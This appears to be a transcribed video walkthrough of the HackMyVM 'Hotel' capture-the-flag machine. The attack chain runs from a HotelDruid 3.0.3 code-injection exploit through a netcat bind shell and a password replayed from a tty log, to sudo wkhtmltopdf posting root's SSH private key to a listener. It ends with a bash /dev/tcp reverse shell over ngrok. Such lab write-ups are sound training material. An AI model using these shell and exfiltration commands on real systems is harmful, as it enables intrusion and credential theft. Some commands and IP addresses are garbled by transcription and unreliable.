Hello guys and welcome to another episode. Today we are going to be looking at a machine called Hotel that is available in HackMyVm. It's a really nice box though it's CTF-like in nature. So you start off by running an nmap scan and discover that HTTP is running on port 80, and you discover that it's running an application called Hotel Druid. So basically it's just an hotel application that is used for the booking process, but you discover that the version that is running it's vulnerable to remote code execution. So what happens is it has a PHP, a code injection vulnerability. After that, you inject PHP code to one of the specific web pages. Then after that, you can get remote code execution on that application. After you learn of the box, you discover that there is a file called TTY log that is used, and it contains a session for the user person. So after using a tool called TTY Play, you discover that you can actually get the password for the user person. So you log in into the box as the using SSH. Then from there, you exploit a tool called wkhtmltopdf to get out of the box. So it's a really nice box. And without much say, let's jump in. So as always, what we're going to be starting by doing is to run an nmap scan of the box. The good thing, if you look at this specific box, you can see that the IP address has already been identified, which is 192.168.116. So I'm just going to be starting by running the top 1000 TCP ports. So to run an nmap scan, you use the tool nmap and the following flags. So nmap-sc to tell it to run safe scripts. Then after that, -sv to tell it to perform version enumeration. Then OA to tell you that it needs to save the output of nmap in a directory called nmap in a file called hotel. So then after that, what you're going to be doing is specifying the IP address which is identified, which is 192.168.100.16. So I've actually already run this before, and as you can see from the results, we only have two ports that are open on the box. So one of them is port 22, which is running secure shell or SSH. And the version of SSH is OpenSSH 8.4p1 Debian 5. So basically this tells you that first of all, the operating system that this server is running on, it's actually Debian. Then from there, we also have a version of the OpenSSH server that is running. So what you can actually do is take this version and try to see if you can identify exploits online by just taking this version and trying to search it in Google. The next thing that you see, there's a port 80 running. As you can see, it's just HTTP, meaning that it's actually running a web browser. Then it's using Nginx version 1.18.0. And you can see also the site title is Hotel Druid. So the next thing that I'm going to do is to first of all just try to open it up and see exactly what you're going to get. So let me just put the IP address, then turn intercept off. We'll use the intercept later, but for the time being, let's just try to see what you're going to get. So we get something that looks like a CMS, and we have a copyright by digitaldruid.net, and it says that Hotel Druid is a free software released under the GNU AGPL. Basically, it just looks like a hotel software if you just try to look through the application. So the first thing I'm going to be doing is to first of all do a manual enumeration. So the first thing that I'm going to be doing is to try to run GoBuster on the site while we enumerate it manually to try to see if it's going to identify anything interesting. So to run GoBuster, what you're going to be doing is to use GoBuster. Then after that, to specify dir to tell it to do directory brute forcing. Then -u for URL, that is the URL. Then after that, we're going to specify a word list, which is -w for word list. Then specify the word which is desktop, git, setlist discovery, web content, rough-small-words.txt. So this is the word list that is going to be using. Then after that, I'm going to specify some extension like PHP and TXT. Then lastly, I'm going to specify threads of 30. So this is the command that we're going to be using. Then leaving it to run in the backend. It has already identified a couple of files. But while this is running in the backend, the next thing that we can actually run is nictoscan. So to run nictoscan, what I'm going to be picking first of all is the IP address. So let's just give it a second. So I'm going to be using nicto-h to specify the URL. Then click run. So basically, nictoscan has already finished, and as you can see, it has identified that there is also a file called readme. And I'm sure if we go back to our Go Buster, we'll find actually that that same file exists. Other than that, it hasn't identified any other thing that is actually interesting, but this is just a basic vulnerability scanner for a web application. So the next that I'm going to be doing is to go back to where a Go Buster was running. And as you can see, it has been able to identify a couple of both directories and files. So it's something that you can actually try to look through them. But the file that actually looks interesting is the README, because sometimes README contains the version of that specific web application that is running. So to just look at it, what I'm going to be doing is to go back to the web application. And first of all, what we're going to be doing is to just, try to see if we can actually access that file. So what I'm going to do, as you can see, is just put the intercept on. Then after that, I'm going to also intercept the traffic using Babsuit. Then again, try to access that specific endpoint. So as you can see, we've been able to intercept that request. I'm going to pass it over to the repeater tab. Let me just close some of these other tabs that are running. Then let me just click send. As you can see, it has been able to identify that this README contains some file, and said that for English users, you can actually try to see the documentation in the docs directory in readme-english. So as you remembered before, doc was one of the directories that we had highly identified. So to do that, what I'm going to be doing is to take this request, send it to another repeater tab so that we can have it there. Then the next thing, I'm just going to pick the file name. Then what I'm going to do is to try to navigate to /doc/readme.english. So here I am. So I'm just going to do /doc, then /readme.english, then click send. And as you can see, we've been able to get the README of this specific web application. And the most interesting thing, we actually have the version of Hotel Druid that is running, which is Hotel Druid version 3.0.3. So what I'm going to be doing, first of all, even to be before doing any manual enumeration, is just to take this specific version, then try to see if there is a way we can actually identify an exploit for this specific version that is running. So to do that, what I'm going to be doing is just taking that, removing the version from this specific place. Then what I'm going to be typing is Hotel Druid 3.0.3, then typing exploit at the end. Then click run. And as you can see, it has been able to identify that Hotel Druid version 3.0.3 is vulnerable to a remote code execution. So remote code execution is a type of vulnerability whereby you're able to execute system commands. See, this is because of, they may be no sanitization, and they're using some dangerous function like system shell exec. But what I'm going to be doing is to just click on the specific exploit. Then what I'm going to be doing is to try to navigate to the page. You can see that the exploit was released in 5th of January of 2022. And as you can see, it says that there is a function for login. There is a function that allows us to check the privileges. There is a function that allows us to add rooms. And then there is a function that allows us to test if code execution was actually successful. So the next thing I'm going to be doing is to view the raw file. Then I'm just going to download it to my specific box so that I can be able to, try to see if the exploit is actually going to work to, in our specific instance. So what I'm going to be using is wget, then specify the exact exploit that we've downloaded from the internet. And as you can see, it actually works. So we've been able to download the exploit successfully. I'm just going to change the file extension name to be a .py. So let me just move it to .py to be a 5754.py. And it has worked because right now we have it as a Python file. Then let me just try and execute it with Python. So Python 3, 50,754.py, then try to use -h and see if you're going to get any the help menu for this specific exploit. And as you can see, it has actually worked. So we have the main menu. So it says that for us to be able to exploit it, we're supposed to provide a target, a username, and a password, and a no auth if no authentication is required to access the dashboard. In our case, we were able to access the dashboard without necessarily having to, use any form of password like a username and a password, or even a cookie. Basically, you just access the application and notice that you have access to the dashboard. So the next thing that I'm going to be doing is to copy the exact URL. then what I'm going to be doing is to go back to my exploit, then specify -t for target, then specify the target, which is HTTP. You have to specify, I think, the schema, which is HTTP 192.168.100.16. Then, given the fact that we were able to access the dashboard without necessarily having to provide any sort of authentication, I'm just going to be using the -no auth to tell you that there was no authentication that is needed to access the dashboard. So let's run it, and as you can see, it has actually worked because we have the output of ID, which is www. We get the user that is running the system is www-data. So it says that code executed successfully, and if we go to this specific PHP application, we can use the parameter called CMD to execute system commands. So, to verify this, I'm just going to be going back to my application, and then what I'm going to be doing is to try to access it, and voila, it works. So if I try to do something like uname-a, we can see that we are able to get the exact we're able to get the exact kernel that is running on this specific Debian box. So basically, our remote code execution works. This is because we were able to inject source code. We are able to inject PHP source code to this specific PHP file. So the next thing I'm going to be doing is actually intercept the request again using Babsuit, because the next thing that you're supposed to do is actually get a shell on the system. So let me intercept it, then try to run the same code again. And as you actually see, we were able to intercept the request. Let me send it to repeater tab, then run it again to just confirm that it works. And as you can see, it works correctly. But I like using post method because even if you have some special characters, they can actually be interpreted more correctly in a post request than a get request. So what I'm going to be doing is right clicking on my mouse, then click on change request method to change the request method from a get to a post, then try to run the exploit to see if it's going to work. And actually it still works. So right now, if still I type something like who am I to see exactly the user that is running the server, you can see it's www, and still it works. And the reason as to why I know it works is because if we go and try to inspect the source code of this specific exploit, you'll notice that this is where we're actually injecting the PHP source code, and it's using $_request. So this allows you to use both get and request method. But the next thing that you're going to be doing is actually trying to get a shell on the system. So the first thing that I tried to do was to see, can this specific VM reach my Kali Linux box? And to test that is actually easy. The only thing that I'm going to be using is a tool called TCP dump. Then try to perform a ping on my machine to see if I'm going to get the result. So I'm going to be using sudo TCP dump -i turn 0 -i. I'm going to specify it not turn 0 because I'm connected via Ethernet, so it's 0, then specify ICMP to tell you that I want to just filter on ICMP request. So I'm going to click enter, then I'm going to type my password, so just give it a second, and it works. So the next thing that I need is to get the IP address of my eth0 address. So then I'm going to be going back to my Babsuit repeater session. Then I'm going to be typing the command ping-c1, then specify the IP address. So what it's going to do is just going to ping my IP address once, and then we're going to see if it's going to work. So if you're able to hear some sort of children playing outside, I'm sorry about that. So I'm going to click URL encode, then try to send the request. Then let's just give it a second and see if you're going to get any ping on my box. And as you can see, probably doesn't work. So I'm not even able to ping myself. So getting a reverse shell, right now appears to actually be a problem. So what I'm going to be using is a different technique. Given the fact that I'm able to reach that box, but it's not able to reach me, I'm going to use something known as a bind shell instead of a reverse shell, telling me that I need you to open a socket, and anybody that connects to that specific socket, I need you to execute the binary bash. So allow him to execute the binary bash. As you can see from the results of the ping, it says that we have 100% packet loss, meaning the ICMP request was actually not successful. So the next thing I'm going to be doing is to try to see if the binary netcat exists on the box. So I'm going to be using the command which then nc to see if we have netcat available on the box. And it was by sheer luck that we have netcat present on the box. So there's also this notion whereby I can actually try and do some routing, networking, to ensure that I'm able to access the box. But given the fact that I identify this late, it's a route I didn't want to take. But there's other methods that we can try to do. We can try to use a port channeling like ngrok, and it's something that I'm going to be doing at the end of the walkthrough after we finish the entire exploitation of this specific machine. Then I'm going to be trying probably to see if forward shell actually works. So it's a technique that I saw IPSEC use once. I do recommend this channel a lot, but what I'm going to be trying to see if we can actually use ngrok and do port forwarding and see if we can actually access the server. Then also I'm going to try and see if you can use forward shell and, at the end of the write-up. But given the fact that right now we have nc as present in the box, I'm going to be using the command nc to tell it I want to use netcat, then nvlp to tell you that I want you to, bind to this specific port, which in my case is going to be port 9001. Then whoever connects, I want you to execute for him the command bin/bash. So basically, this is the command I'm going to be using. And you might be asking, sometimes you've noticed that some boxes actually, use the OpenBSD version of netcat, which doesn't contain this -e version. So if this happens, definitely our command is actually not going to work. But there's a way you can actually confirm. So if I type nc-help, then let me send and see if it's going to work. You can see it. We didn't get any help menu for this specific binary, and the reason as to why this happened, it's because of the fact that it's standard error. So mostly we only see what's on standard out, but to see whatever it's on standard error, you're going to be using to tell it I want you to direct whatever it's on standard error to standard out. So it's going to be to redirect and to standard out. So basically this is the command I'm going to be using, and still it doesn't work. Let me try to URL encode. So still, but right now we actually get something. We get invalid options. So what I'm going to be doing is it requires us to use -h not -help. So let me try it again, and this time it's actually works. So we're going to see if -e exists, and it actually exists in our specific version of netcat because it says -e and it's programmed to execute after connect. So basically the moment we connect to that specific port that was created by netcat, it's going to execute the program bin bash. So this is the command that we're going to be using, and as we've seen before, I think we need to do a URL encoding. So I'm just going to URL encode. Then the next thing that I'm going to be doing is to go back to my terminal, then exit on this one. Then I'm just going to be using the command nc 192.168.100.16. Then I want it to port to connect to port 9001. So the next thing that I'm going to be doing is click send. We're going to see that the system hangs. But right now, if I go here and I click run that command, you can see it says that we were able to, we connected to that port successfully. So if I run the command ID, you can see I'm able to execute system commands on that specific server. If I run who am I, it works. If I run ls-la to release the contents of that specific directory, we can see it actually also works. So the next thing that I'm going to be doing is actually setting up the TTY of that specific server. So in my case, I'm going to be using the tool called Python. Python is just a program use, it's just an interpreted language, but we're actually going to be using it to, just try to stabilize the shell so that we can actually use some certain commands like even sudo -l to see if it's going to work. So to stabilize the shell, I'm going to be using the command python 3. So let me try to type it and see if it's going to work. So Python 3 to specify, I want you to run it on Python 3, and actually this binary needs to exist. And as we said before, to see if the binary exists, you're going to use command which, then specify the binary name, which is Python 3. And as you can see, it actually works. So Python 3 is in user bin Python 3. So I'm going to be using Python 3, then specify -c to tell it that I want you to run whatever is in these quotes. So I'm just going to be using the command import pty, then comma pty.spawn, Then what I'm going to be using is /bin/bash. So save it, then run it, and as you can see, it has actually worked. The next thing I'm going to do is Control-Z, then stty row minus echo fg, then enter, and it works. So the next thing I'm going to be doing is export terms so that we can actually clear the screen. Then I'm going to be using export terms equals to screen. Then if I press Control L, voila, we have something that is actually working for us. So the next thing that I'm going to be doing is to try to see if there is a way, or there's an exploit that I can actually run on this specific box. So to do this, we already have a shell on the box, but we need to do both lateral movement and privilege escalation. So lateral movement is try to see if are there any other users with the low privileges that we can try to access, or vertical movement that can we access the root? Can we exploit a certain misconfiguration or vulnerability, then get root access on the system? So that's the next step on this specific web application. So what I'm going to be doing is to run linpiece. So to do that, what I'm going to be doing, it's downloading the binary linpiece. But in my case, I've already downloaded. The best thing is I actually have internet running on this specific box, and to confirm it is just to do something like ping google.com to see that we actually have access to the internet, and it works because we're able to ping it and get a successful response. So what I did was just go to the linpiece GitHub folder and download linpiece.sh, then save it in dev.shm. Then to run it, I just go to dev.shm, then play bash and write bash, then type linpiece.sh. .sh. I hope the binary still exists. So the binary doesn't exist anymore. So what we're going to do is to go back online. Let me click intercept off. We actually don't need buff suit again. Then let me just turn off the intercept. Then I'm going to be going to the directory, to the GitHub repository known as pcng, then download linpiece again. So this is the directory that I was talking about. So linpiece is just a tool, or from pcng, that allows us to enumerate any misconfiguration and allows us to perform privilege escalation on both Linux and Windows boxes. So what I'm going to go is to releases, then download linpiece.sh. So let me copy link. Then go back to dev.shm, then download the specific binary that I've been talking about. So once it's downloaded, if I do a directory listing, you can see that linpiece actually exists. Then I'm going to be using the command bash, then linpiece.sh, and try to see if we can actually, find any specific vulnerabilities that the application might have, or any misconfiguration that we can actually exploit on the system. So I'm just going to leave it to run. I hope it's going to finish soon. Then we're going to be looking at the results to see if you're going to find anything interesting. So after a few seconds, we notice that linpiece is actually completed successfully. Then we can enumerate the result to see if you're going to get anything interesting. So let me go back up to see if you're going to get anything interesting. Mostly right now, what I'm looking for credentials to access something like a MySQL server. So let's just give it a second to see if anything stands out. So far, nothing actually stands out. Nothing that really looks interesting. So we have this binary code write.ul, which is a non-SGID binary, a group ID binary. So it's something you can actually look at. But in our case, it doesn't look interesting. Given the fact that I've actually done this box before, I did record a write-up, but it's something that I did look at whenever I was doing the box initially. So this is the nginx file that allows us to connect to this specific site. So here it is. I'm trying to see if there's anything interesting. So these are the traditional binaries or useful binaries that you can actually use on this specific system. These are all the users and the groups that are identified on this specific system. Still nothing interesting. As you can see, it has identified that my SQL server is running, but it's running on localhost port 3306. We can see that this is the IP address of the system that you're trying to connect to. These are the specific dbus services. but nothing actually stands out. So what we did was just manual enumeration on this specific site. But what we can do is, if we do bash linpis.sh, then type help, you can see we can specify dash let me try to see if I can actually find it, because there's a way you can actually run a full enumeration scan. So I think you just have to specify dash a. I can't see it on this specific output, but it's something that I know you can actually do. So if you specify dash a, it will run an all it will run all on enumeration. So let's just try to run it again, then we can try to see if it's going to identify anything interesting that wasn't captured by the simple scan. So I'm going to pause the video once again, then once it completes, we're going to continue. Go back to Google, then type. So again, after a while, we noticed that Greenpeace was actually finished. And the file that actually looked a bit interesting to me is this one called dirty coincn.php. Probably this is Italian. And to confirm that, what I can actually do is to copy this, then go back to Google, then type Google Translate. So let me try to see if I can be able to translate exactly what language this is. So give it a second, and it says data underscore connection. So basically that's, data underscore connection.php. So this is the file that I'm actually interested in. And to look at it, what I'm going to do is just to copy the file path, then try to see if I can just cut it, on my box. And as you can see, it contains the configuration that allows us to log into MySQL. So the next thing that I tried to do was to see, can I be able to get any useful credentials from MySQL. And to confirm it, let's just log into MySQL, then dash user, choose admin, admin, then H, then specify dash P for the password, then enter the password, which is admin, then P. And as you can see, we've been able to log into MySQL MariaDB. Then I'm going to be using the command show databases, then followed by a comma to see exactly what databases we have. And the database that looks more interesting right now is the hotel. Then I'm going to do use hotel to specify that I want to use the hotel database, and it says that database was changed successfully. Then the next thing that I'm going to try and see if what kind of tables that does this database has. So to do that, I'm going to be using the command show tables, and as you can see, it actually has a lot of tables, but most of them are in a foreign language. So basically, you can't actually even figure out what it is. But what I did was got back to Google Translate. Then it translated entirely into English, and the table that looked interesting was users, which was the second last. So the users is the one called Utenti. I hope I spelled it correctly. But what I'm going to be doing is using the command describe. That specific table, and as you can see, it contains some specific columns. So what I'm just going to be doing is pretty simple. Just try to extract it and see if you're going to get any interesting usernames or passwords that can actually allow us to either perform privilege escalation or even lateral movement on this specific application. So what I'm going to be doing is select, then start to tell it select everything in that specific table from, then specify Utenti, which is the specific table that we want. Then I'm just going to be using a -G to tell it to, this is the way I wanted it to format the results. And we have a username called admin, but the password is none. So basically, MySQL hasn't given us anything interesting. And also, if we decide to look at the linked results that we had initially identified. So let's just give it a second. You can see that, give it a second, I'm just looking for the MySQL MariaDB process. So the MySQL is running as the MySQL user. So even if we exploit it, it's still not going to give us any privilege escalation. So basically that appears to be a dead end. So I'm just going to exit from the database. Then we're just going to go back to var var dash www dash html. Then I'm going to do an ls, and the file that actually looked more interesting to me is this one called tty log. So what I'm going to be doing is to try to see, we have read access to cut it and see if it contains anything interesting. And what made it look more interesting is because it contained this following command prompt. So person at hotel. So if we look at our etc passwd file, passwd, then what I'm going to be doing is to grep anything that ends with an sh. And as you can see, we have a user in the box called person. So that's why this specific file looked interesting to me. So what I just did next was just go to Google and then type what is tty log? What is tty log? Then see if you're going to get anything interesting. So it doesn't. What is a tty log file? So basically, it's still not even giving me exactly what I want. But if we go to ChatGPT, then you just type that specific command, we are going to see that it's going to tell us exactly what that file is about. So what I'm going to be doing is just pausing up the video again, then logging into ChatGPT so that we can actually look at exactly what definition ChatGPT gives us. So I've managed to log into ChatGPT. Then what I'm going to do is to just try to type what is a tty log file. So let's click enter. Then it says a tty log file, so also known as a terminal log file, is a file that contains a record of the input or output of a terminal session. This includes command entered, response received, and other information displayed on the terminal. Tty log files are often used for debugging and troubleshooting terminal-based application and system. They can be used to record and review the actions of users on a system and security compliance. So basically, we've actually gotten the exact definition that we were looking for. So it's just a terminal log file, but basically it contains a record of whatever input that was used. So the next step, is trying to see exactly, how can we try and decrypt it to get exactly what's saved on this specific session. And to do this, I discovered that, the application the server has something known as tty play. So basically, after trying falling into a crazy rabbit hole, I discovered that the server has a tool called tty play, whereby I think it just plays a tty session that was actually recorded previously. So what I did was try to see if I can actually play the specific tty log file that we received on this specific directory of var.html. So it just specified the program name, which is tty play, then specified the file tty log. So and as you can see, give it a second, it will actually start playing. It says that my password is this one. Then what it does is it starts typing probably a password. So this is the password that it typed. Then it says enjoy at the end. So basically it says that this is the password. So what you can try to do is to try to see if we can use this password and log in as the person user in this specific SSH instance. So as you remember, if I do go back again to my nmap scan, I think we all saw that there was an SSH port that was open. So you can actually try and access it and see if you're actually going to log in successfully into the system. So let me just confirm that I have the password in the clipboard and actually it works. So what you're going to do is to click to type SSH person at 192.168.200.16, then type the password, and as you can see, it actually works. So we've managed to log in into the system as the person user. And then if we type sudo -l, we notice that we can actually run a tool called wkhtmltopdf as the root user. So basically, it's something that we need to exploit probably to get root access on this specific system. So what we just try to see first of all is the functionality that this specific application has. And you can find that if we do sudo -u to specify the user root that has been said, then specify the tool itself, then type -h, you can see you can actually get the help manual of this specific application. So one command worked for me, that was post, whereby you can actually post the exact contents of this specific file. And to do that is actually really simple. So even before running it, what I'm going to be doing is actually didn't save the password that I used to log in initially, but thank God it is. So what I'm going to be doing is to log in into the box using another SSH session, then specify the password. Let's hope it works. It seems like it doesn't. Let me see if I have the correct. I think I didn't copy the password correctly, so let's copy it again. Copy selection. It seems like it doesn't want to copy. Okay, yeah, now it works. So what I'm going to be doing is to try to SSH again into the box. Wow, yeah, and it actually works this time. Then what we are going to do is to set up another netcat instance on port like let's say 9001 and CNVLP port 9001. Then what we're going to do is to go back to a specific application, then run the following command, which is sudo user root wkhtmltopdf, then post file tell. We want it to post the file sid_rsa to the following URL. So the URL that I used is 9001. Let's so try it and see if it's going to work. And voila, it actually works. So basically it was able to read that file and post it to this specific netcat session, and we have the root SSH private key. So what I'm going to be doing is to save it in a file called root, and I don't think it copied correctly because I don't have the exact contents. So let me just copy it again, because if the file is not correct in any way, you'll notice that we can't actually log in into the system because it actually fails. So let me make sure that I copy it correctly, then go back. Then what I'm going to be using is set paste, then try pasting it again, and still it fails, and I don't know exactly why. But what we can do is type enter, then try to see if we can paste whatever was selected before, and this one actually works. So basically I think it can just be an error in my system itself. It's something that I'll look into later on. But what we're going to be doing is to just save this file. There it is. So if I cut root, it contains the private key for the root user. I'm going to be using chmod to make sure that we are the only person that people that can actually read it. So chmod 600, then specify the root key. There it is. Then I'm going to be using SSH, then change the logged in user to root, then specify the private key, which is also root, then try to log in and see if it's going to work, and voila, it works. So we've actually logged into the system as root, and if I go to the root directory, you'll notice that we have root.txt. So basically you can actually read it and get the root flag, then submit it. And also if I go to /home, because we had a user called person that we exploited before, he also has a user.txt. And if we try to look at user.txt, it also contains the flag. You can also submit it and get the points. So that is it for the video. So let's go to beyond root. So initially I tried to see if there was a way we could actually be able to get shell other than using the bind shell itself. So let me just first of all close all these sessions that we had opened initially. So let's just close all of them and then start working on a clean pen. So let me close all of them up, and so that we can actually remain with one session. and there it is. So let's first of all go back to our burp suite. Then the first thing that we're going to try to see if we can get a shell using ngrok. So to do that, first of all, let me make sure that the server is still working and we can actually execute commands and we see it works. So the next thing I'm going to do is to go to my git directory, then specify ngrok. Then I'm going to start ngrok. So basically ngrok is just a port forward. So what I'm going to type is /ngrok, then specify the TCP port to tell it I want you to connect to TCP port on port 9001. So basically it's going to instantiate a server, then give me an address and a port that I can actually connect to. But remember, it's forwarding our traffic from this specific TCP port to localhost port 9001. So I'm going to go back to my host, then connect to on 9001. Then I'm going to go to the shell that we had before, then type the command bash-c, then specify a double quote, then bash-i, sorry about that, greater than end /dev tcp. Then remember we already have the hostname that you're supposed to use, which is this one. Then the port that we're going to be using is 12,320. Then after that, I'm going to specify in 0 greater than end 1. So I'm just going to close it up. Then I'm going to URL encode the entire thing. Then try to click send. And if we look, we still have a shell on that specific system. So basically it works. You could have put in a reverse shell by doing port. So lastly, we were supposed to try and get a forward shell using a technique that IPSec actually, created. But while tinkering with the script, I noticed that it kept giving me an error. So it's something that I wasn't able to do. But I'll keep on doing some research. If by any chance it works, I'll be recording a video during the course of the week, then sharing. But till now, that's it for the video. I hope you subscribe and share, and let's meet next time. Goodbye.